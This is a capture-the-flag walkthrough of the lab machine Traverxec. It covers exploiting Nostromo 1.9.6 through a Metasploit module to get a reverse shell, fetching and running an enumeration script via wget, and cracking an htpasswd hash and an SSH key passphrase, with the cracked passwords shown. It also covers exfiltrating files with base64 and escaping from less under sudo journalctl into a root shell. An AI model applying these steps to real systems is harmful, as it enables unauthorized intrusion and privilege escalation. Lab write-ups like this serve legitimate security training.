By: Hilbert


Starting with a standard nmap scan…

# Nmap 7.80 scan initiated Sat Nov 16 20:02:47 2019 as: nmap -sC -sV -p- -oN nmapscan.txt
Nmap scan report for
Host is up (0.083s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Nov 16 20:04:58 2019 -- 1 IP address (1 host up) scanned in 131.07 seconds

We see nothing but 22 and 80 are open, and navigating to the webpage we don’t see much of interest


However if we run searchsploit on nostromo

root@kali:~/HTB/Boxes/Traverxec# searchsploit nostromo

We will see there is a metasploit module for remote command execution in Nostromo <= 1.9.6


We load metasploit and then use the nostromo exploit and set the RHOST and LHOST variables


and get a reverse shell as low privilege user www-data.

Let’s run an enumeration script. We set up a python HTTP server on our local machine where we have our enumeration scripts

root@kali:/opt/privesc# python -m SimpleHTTPServer 
Serving HTTP on port 8000 ...

Then run wget on the remote machine to download the script so we can run it.

www-data@traverxec:/tmp$ wget
--2019-11-19 00:40:10--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 45656 (45K) [text/x-sh]
Saving to: ''          100%[===================>]  44.59K   188KB/s    in 0.2s    

2019-11-19 00:40:10 (188 KB/s) - '' saved [45656/45656]

Then change mod on the script and run it

www-data@traverxec:/tmp$ chmod +x 
www-data@traverxec:/tmp$ ./ 
# Local Linux Enumeration & Privilege Escalation Script #                                                                                                      
# version 0.971                                                                           
[-] Debug Info 
[+] Thorough tests = Disabled

Scan started at:
Tue Nov 19 00:52:42 EST 2019

If we go over the output one thing that will definitely stand out is

[-] htpasswd found - could contain passwords:   

we know that david is the user of the machine from the /etc/passwd file, and now we have a password hash belonging to him. So lets crack it! We’ll use John The Ripper and the popular wordlist “rockyou.txt”

We copy and paste the hash into a file called hash.txt and then run john like so


We now have the password “Nowonly4me”, but we’ll find that it wont work for either SSH or su’ing to david. If we dig around a little more in the /var/nostromo/conf/ folder and cat the nhttpd.conf file

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html


logpid                  logs/


user                    www-data


htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd


/icons                  /var/nostromo/icons


homedirs                /home
homedirs_public         public_www

We see that /home is the home directory and there is a public_www folder. If we look at /home/david/ we get permission denied, however if we look at /home/david/public_www we see some files.

www-data@traverxec:/var/nostromo/conf$ ls -la /home/david
ls -la /home/david
ls: cannot open directory '/home/david': Permission denied
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 5 david david 4096 Nov 18 23:53 ..
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area
<conf$ cd /home/david/public_www/protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david   45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz

It seems can’t access the important looking backup-ssh files, however since we can read the file it’s possible for us to move it to our computer to extract it by using base64.

base64 encode

We simply copy the output and then paste it to a file on our computer, decode it, and then unzip as normal

base64 decode

If we couldn’t think of a way to access the file and got stuck, and tried looking at to no avail, as with all things when we stuck or frustrated, lets RTFM. Looking up the documentation for nostromo which we can find at, we see the following

     To serve the home directories of your users via HTTP, enable the homedirs
     option by defining the path in where the home directories are stored,
     normally /home.  To access a users home directory enter a ~ in the URL
     followed by the home directory name like in this example:


     The content of the home directory is handled exactly the same way as a
     directory in your document root.  If some users don't want that their
     home directory can be accessed via HTTP, they shall remove the world
     readable flag on their home directory and a caller will receive a 403
     Forbidden response.  Also, if basic authentication is enabled, a user can
     create an .htaccess file in his home directory and a caller will need to

     You can restrict the access within the home directories to a single sub
     directory by defining it via the homedirs_public option.

Bingo! Trying we are greeted with


and gets us something we can successfully enter in the credentials we found earlier login

which then gives us access to the backup-ssh file


Extracting the tar file we see it’s as advertised a backup of the ssh identity files.

root@kali:~/HTB/Boxes/Traverxec# tar -xvzf backup-ssh-identity-files.tgz 

Let’s crack the id_rsa file and then try and use it to SSH in as david. To do this first we need to convert it to a format we can use in john the ripper. We will use a python script included with john called Then we can crack the resulting file as we did the previous hash.


Now using that ssh key and the password “hunter” we SSH in as david.

root@kali:~/HTB/Boxes/Traverxec# ssh -i home/david/.ssh/id_rsa david@
Enter passphrase for key 'home/david/.ssh/id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 12:44:42 2019 from
david@traverxec:~$ ls /home/david/
bin  public_www  user.txt

as we can see we now have access to the user flag

On to Root

We see a “bin” folder in the user directory, if we examine the contents we find a script named “”, which if we cat shows us

david@traverxec:~/bin$ cat

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Examining and running it we see it’s basically just outputting a header (the other file in the bin directory) and a bit of information about the server. The last line of this script is the most important. We see it is running sudo and then journalctl, this means that journalctl is running with elevated privileges so if we can can figure out a way to bend that to our will we will have root privileges. However we don’t seem to be able to change any of the arguments. When we run anything other than “sudo journalctl -n5 -unostromo.service” we are asked to supply a password.

If we look at GTFObins for journalctl ( we see an important bit of information.


So journalctl is using less to write to the screen, and if we follow the link we see that we can break out of less into an interactive shell.

gtfobins less

There may or may not be a problem here depending on how big your terminal window is. If our terminal window is large enough to display everything outputted both vertically and horizontally then less will never give us the opportunity to break out into a shell, it will just output everything like so

less too big

But if we change the size of our terminal so that it is too narrow to display the entire line

less too big

or not tall enough to display all the lines less too big

less does what less is supposed to do, and we can then enter !/bin/bash to escape into a root shell

less too big

Or we can use the stty command to change our terminal settings. “stty rows 5” will output only 5 lines when less is used and that will also allow us the opportunity to break out into a shell. Either way we now have access to the root flag.

If you found this walkthrough helpful, please consider adding a respect to my profile, thanks.